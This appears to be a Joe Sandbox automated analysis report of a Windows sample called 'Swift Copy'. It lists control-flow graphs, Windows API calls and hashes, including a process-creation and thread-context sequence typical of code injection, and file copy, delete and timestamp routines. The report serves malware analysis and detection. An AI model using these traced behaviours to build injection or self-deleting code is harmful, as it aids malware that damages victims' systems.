                                              control_flow_graph 1527 de2947-de29b9 call db1f50 call de25d6 call d8fe0b call d75722 call de274e call d7511f call d95232 1542 de29bf-de29c6 call de2e66 1527->1542 1543 de2a6c-de2a73 call de2e66 1527->1543 1548 de29cc-de2a6a call d9d583 call d94983 call d99038 call d9d583 call d99038 * 2 1542->1548 1549 de2a75-de2a77 1542->1549 1543->1549 1550 de2a7c 1543->1550 1553 de2a7f-de2b3a call d750f5 * 8 call de3017 call d9e5eb 1548->1553 1552 de2cb6-de2cb7 1549->1552 1550->1553 1554 de2cd5-de2cdb 1552->1554 1592 de2b3c-de2b3e 1553->1592 1593 de2b43-de2b5e call de2792 1553->1593 1558 de2cdd-de2ced call d8fdcd call d8fe14 1554->1558 1559 de2cf0-de2cf6 1554->1559 1558->1559 1592->1552 1596 de2b64-de2b6c 1593->1596 1597 de2bf0-de2bfc call d9e678 1593->1597 1598 de2b6e-de2b72 1596->1598 1599 de2b74 1596->1599 1604 de2bfe-de2c0d DeleteFileW 1597->1604 1605 de2c12-de2c16 1597->1605 1601 de2b79-de2b97 call d750f5 1598->1601 1599->1601 1611 de2b99-de2b9e 1601->1611 1612 de2bc1-de2bd7 call de211d call d9dbb3 1601->1612 1604->1552 1607 de2c18-de2c7e call de25d6 call d9d2eb * 2 call de22ce 1605->1607 1608 de2c91-de2ca5 CopyFileW 1605->1608 1609 de2cb9-de2ccf DeleteFileW call de2fd8 1607->1609 1632 de2c80-de2c8f DeleteFileW 1607->1632 1608->1609 1610 de2ca7-de2cb4 DeleteFileW 1608->1610 1620 de2cd4 1609->1620 1610->1552 1616 de2ba1-de2bb4 call de28d2 1611->1616 1627 de2bdc-de2be7 1612->1627 1625 de2bb6-de2bbf 1616->1625 1620->1554 1625->1612 1627->1596 1629 de2bed 1627->1629 1629->1597 1632->1552
                                              APIs
                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DE2C05
                                              • DeleteFileW.KERNEL32(?), ref: 00DE2C87
                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DE2C9D
                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DE2CAE
                                              • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DE2CC0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: File$Delete$Copy
                                              • String ID:
                                              • API String ID: 3226157194-0
                                              • Opcode ID: 9cf0c94ed6bf53f0d4302deee4dc1689dee7634855a119c11364b8893031c1d4
                                              • Instruction ID: 9bccb8110f97812e6cdb1a6cd843c9a502cc89c1dcf2333848db030af6320dd9
                                              • Opcode Fuzzy Hash: 9cf0c94ed6bf53f0d4302deee4dc1689dee7634855a119c11364b8893031c1d4
                                              • Instruction Fuzzy Hash: B5B15D72D00119ABDF21EBA5CC85EEEBBBDEF48350F1040A6F609E6155EA319A448F71

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1943 d73b1c-d73b27 1944 d73b99-d73b9b 1943->1944 1945 d73b29-d73b2e 1943->1945 1946 d73b8c-d73b8f 1944->1946 1945->1944 1947 d73b30-d73b48 RegOpenKeyExW 1945->1947 1947->1944 1948 d73b4a-d73b69 RegQueryValueExW 1947->1948 1949 d73b80-d73b8b RegCloseKey 1948->1949 1950 d73b6b-d73b76 1948->1950 1949->1946 1951 d73b90-d73b97 1950->1951 1952 d73b78-d73b7a 1950->1952 1953 d73b7e 1951->1953 1952->1953 1953->1949
                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00D73B0F,SwapMouseButtons,00000004,?), ref: 00D73B40
                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00D73B0F,SwapMouseButtons,00000004,?), ref: 00D73B61
                                              • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00D73B0F,SwapMouseButtons,00000004,?), ref: 00D73B83
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID: Control Panel\Mouse
                                              • API String ID: 3677997916-824357125
                                              • Opcode ID: 68d777c0a7cd8f4ffe5b0de83bd002b6fb610e87cef3ef523de740888b5ba437
                                              • Instruction ID: 316be0c03da355c77fba6dd17c26fb7517977b7dd9d15feadd2109b9d3ad2f46
                                              • Opcode Fuzzy Hash: 68d777c0a7cd8f4ffe5b0de83bd002b6fb610e87cef3ef523de740888b5ba437
                                              • Instruction Fuzzy Hash: BC112AB5510218FFDB208FA5DC44AEEB7BCEF04744B14855AA809E7110E2319E44A7A0
                                              APIs
                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 00ED1ACD
                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00ED1AF1
                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00ED1B13
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1678475420.0000000000ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ed0000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                              • String ID:
                                              • API String ID: 2438371351-0
                                              • Opcode ID: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                              • Instruction ID: 390f496773ce4cf2ad5461b3327c6abacc3ba8af4226e81f4948a7fc0748f1f9
                                              • Opcode Fuzzy Hash: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                              • Instruction Fuzzy Hash: 12620930A14258DBEB24CFA4C850BDEB372EF58304F10A1AAD50DEB390E7759E81CB59
                                              APIs
                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00DB33A2
                                                • Part of subcall function 00D76B57: _wcslen.LIBCMT ref: 00D76B6A
                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D73A04
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: IconLoadNotifyShell_String_wcslen
                                              • String ID: Line:
                                              • API String ID: 2289894680-1585850449
                                              • Opcode ID: 21535e33ff1a66cf3b0cc5ee7583151f9c8a16c1e83998e2a2737c480bd7c5b8
                                              • Instruction ID: 2071971abb97fd7963bbaf411331fce2c5e38de7cff3a1d4a86a0cf6a1b2d6c9
                                              • Opcode Fuzzy Hash: 21535e33ff1a66cf3b0cc5ee7583151f9c8a16c1e83998e2a2737c480bd7c5b8
                                              • Instruction Fuzzy Hash: 2031A271408310AEC721EF24DC46BEBB7E8EB81710F14856AF59D92191FB709689DBF2
                                              APIs
                                              • GetOpenFileNameW.COMDLG32(?), ref: 00DB2C8C
                                                • Part of subcall function 00D73AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D73A97,?,?,00D72E7F,?,?,?,00000000), ref: 00D73AC2
                                                • Part of subcall function 00D72DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00D72DC4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Name$Path$FileFullLongOpen
                                              • String ID: X$`e
                                              • API String ID: 779396738-4036142377
                                              • Opcode ID: 2dba1ff56b5055bd3431291d5abeaf36c57b419de6c0c6d159f51d85381e6d49
                                              • Instruction ID: 7fbbe86c733d59a325916f02e8e2bfbdaa5989512db90ed7e570e8ebd10c7a5d
                                              • Opcode Fuzzy Hash: 2dba1ff56b5055bd3431291d5abeaf36c57b419de6c0c6d159f51d85381e6d49
                                              • Instruction Fuzzy Hash: 20216671A00298AFDB11DF94C8457EE7BF8EF49314F108059E549B7241EBB49A89CB71
                                              APIs
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00D90668
                                                • Part of subcall function 00D932A4: RaiseException.KERNEL32(?,?,?,00D9068A,?,00E41444,?,?,?,?,?,?,00D9068A,00D71129,00E38738,00D71129), ref: 00D93304
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00D90685
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Exception@8Throw$ExceptionRaise
                                              • String ID: Unknown exception
                                              • API String ID: 3476068407-410509341
                                              • Opcode ID: 94f9b29dc1cd6fa32907b54fd5750b10f036accc3cbcfa922fab6f9d5cedcf00
                                              • Instruction ID: 5497b59335666f923ae1beb77d94432b6e3b9e027a3d678398d8791308ca0f04
                                              • Opcode Fuzzy Hash: 94f9b29dc1cd6fa32907b54fd5750b10f036accc3cbcfa922fab6f9d5cedcf00
                                              • Instruction Fuzzy Hash: A5F04F24900309BB8F00B7A4E84AD9E7B6C9E40350B644531B924D65D2EF71EA66C6B0
                                              APIs
                                              • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00DE302F
                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00DE3044
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Temp$FileNamePath
                                              • String ID: aut
                                              • API String ID: 3285503233-3010740371
                                              • Opcode ID: 304ba0cd37a55141564905e57a26bece504a7f4447950329c99443d6ba880124
                                              • Instruction ID: 6a3b1f96fc54c5c4437482a5cd668239ac0936fa5d7e7a3f35281c1e74863b57
                                              • Opcode Fuzzy Hash: 304ba0cd37a55141564905e57a26bece504a7f4447950329c99443d6ba880124
                                              • Instruction Fuzzy Hash: 57D05E72500328BBDA20A7A5AC0EFDB3E6CDB05750F0002A1B655F20E1DAB19988CAD0
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00DF82F5
                                              • TerminateProcess.KERNEL32(00000000), ref: 00DF82FC
                                              • FreeLibrary.KERNEL32(?,?,?,?), ref: 00DF84DD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Process$CurrentFreeLibraryTerminate
                                              • String ID:
                                              • API String ID: 146820519-0
                                              • Opcode ID: 0fe2582a9dc821c853a072ef294d716488afcf31862ff255d863d78bcaaaaf15
                                              • Instruction ID: c68470c3fd6ee0878b2d870d9ffac07fa6d90368d1417a29263380d24b2fb08d
                                              • Opcode Fuzzy Hash: 0fe2582a9dc821c853a072ef294d716488afcf31862ff255d863d78bcaaaaf15
                                              • Instruction Fuzzy Hash: FA127B71A083459FC714DF28C484B2ABBE1FF85318F19C95DE9898B352DB31E945CBA2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d2abdebf024dcc8e7ada43e85c5cb86ba1177ddf74a4239efa8ac9c1befca0e7
                                              • Instruction ID: 7e12bf1c6bd3b17e998c3de122644baecfef4cda1facb9da9932a2e95a4e1eee
                                              • Opcode Fuzzy Hash: d2abdebf024dcc8e7ada43e85c5cb86ba1177ddf74a4239efa8ac9c1befca0e7
                                              • Instruction Fuzzy Hash: 7751A175E00609AFCF10AFA5E845FAEBBB8EF07320F180159F505A7299D675D901CB71
                                              APIs
                                                • Part of subcall function 00D71BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D71BF4
                                                • Part of subcall function 00D71BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00D71BFC
                                                • Part of subcall function 00D71BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D71C07
                                                • Part of subcall function 00D71BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D71C12
                                                • Part of subcall function 00D71BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00D71C1A
                                                • Part of subcall function 00D71BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00D71C22
                                                • Part of subcall function 00D71B4A: RegisterWindowMessageW.USER32(00000004,?,00D712C4), ref: 00D71BA2
                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00D7136A
                                              • OleInitialize.OLE32 ref: 00D71388
                                              • CloseHandle.KERNEL32(00000000,00000000), ref: 00DB24AB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                              • String ID:
                                              • API String ID: 1986988660-0
                                              • Opcode ID: 2028accfc17a3562ae63d3cc0804aea0bff847372da838f696d66cb8e32737db
                                              • Instruction ID: e2245f5f395f520a9b4d3dfa46db48932f4d878872f99764e85c935f49ce0ee9
                                              • Opcode Fuzzy Hash: 2028accfc17a3562ae63d3cc0804aea0bff847372da838f696d66cb8e32737db
                                              • Instruction Fuzzy Hash: 367190BC9113448ECB84DF7BE8466953AE0FBCA34435492AAD51AF7261F73844CACF61
                                              APIs
                                              • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,00DA85CC,?,00E38CC8,0000000C), ref: 00DA8704
                                              • GetLastError.KERNEL32(?,00DA85CC,?,00E38CC8,0000000C), ref: 00DA870E
                                              • __dosmaperr.LIBCMT ref: 00DA8739
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                              • String ID:
                                              • API String ID: 490808831-0
                                              • Opcode ID: 24567cac18c61fd02e7566b85c0c994945f422cdef4e36cee3fa1545b4f624f8
                                              • Instruction ID: f5aa0b84cf56ffb2fae20be2a6a77228cb5889f9134cf31d4939b282d703eb22
                                              • Opcode Fuzzy Hash: 24567cac18c61fd02e7566b85c0c994945f422cdef4e36cee3fa1545b4f624f8
                                              • Instruction Fuzzy Hash: 6501D633A056602AEA646334B845B7E67498BC3774F3D0269FD149B1D2DEB5CC85A1B0
                                              APIs
                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00DE2CD4,?,?,?,00000004,00000001), ref: 00DE2FF2
                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00DE2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DE3006
                                              • CloseHandle.KERNEL32(00000000,?,00DE2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DE300D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: File$CloseCreateHandleTime
                                              • String ID:
                                              • API String ID: 3397143404-0
                                              • Opcode ID: bac230bcc054d1bc80860cbbc320c39d3cd5310a7c38b9ecff1a46982e00d049
                                              • Instruction ID: fb0286c6d805f7d209f4f79f2ede05ca3dbd2f8eec7b762a76e0b356dddd7c25
                                              • Opcode Fuzzy Hash: bac230bcc054d1bc80860cbbc320c39d3cd5310a7c38b9ecff1a46982e00d049
                                              • Instruction Fuzzy Hash: A8E086322812147BD2302756BC0DF8B3A2CD78AB75F204310F759760D046A1154542A8
                                              APIs
                                              • __Init_thread_footer.LIBCMT ref: 00D817F6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Init_thread_footer
                                              • String ID: CALL
                                              • API String ID: 1385522511-4196123274
                                              • Opcode ID: b7dce755c25e901a0052ad0f30338cd436a66923e2e3efd473b6bdbdac6686fa
                                              • Instruction ID: 687d50d5a4f0090f1c24f2d8f5d274d97ac66fffe3ba0e43d7a3521bde80fde8
                                              • Opcode Fuzzy Hash: b7dce755c25e901a0052ad0f30338cd436a66923e2e3efd473b6bdbdac6686fa
                                              • Instruction Fuzzy Hash: 7E227A746082419FC714EF14C481B2ABBF5FF85314F28896DF59A9B3A1D731E84ACB62
                                              APIs
                                              • _wcslen.LIBCMT ref: 00DE6F6B
                                                • Part of subcall function 00D74ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D74EFD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
